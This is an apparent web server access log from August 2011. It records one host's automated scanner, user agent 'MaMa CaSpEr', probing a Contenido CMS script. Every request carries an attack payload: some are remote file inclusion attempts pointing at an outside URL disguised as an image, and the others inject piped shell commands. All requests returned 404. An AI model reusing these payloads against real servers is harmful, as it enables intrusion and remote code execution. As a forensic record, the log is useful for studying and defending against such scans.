66.71.188.13 - - [28/Aug/2011:15:58:05 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://seeclearlyaccounting.com/recipe/seeclearlyaccounting.jpg?? HTTP/1.1" 404 392 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:15:58:05 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://seeclearlyaccounting.com/recipe/seeclearlyaccounting.jpg?? HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:15:58:05 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:15:58:05 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:15:58:05 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 392 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:15:58:14 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://seeclearlyaccounting.com/recipe/seeclearlyaccounting.jpg?? HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:15:58:14 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://seeclearlyaccounting.com/recipe/seeclearlyaccounting.jpg?? HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:15:58:14 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:15:58:14 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:15:58:26 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://seeclearlyaccounting.com/recipe/seeclearlyaccounting.jpg?? HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
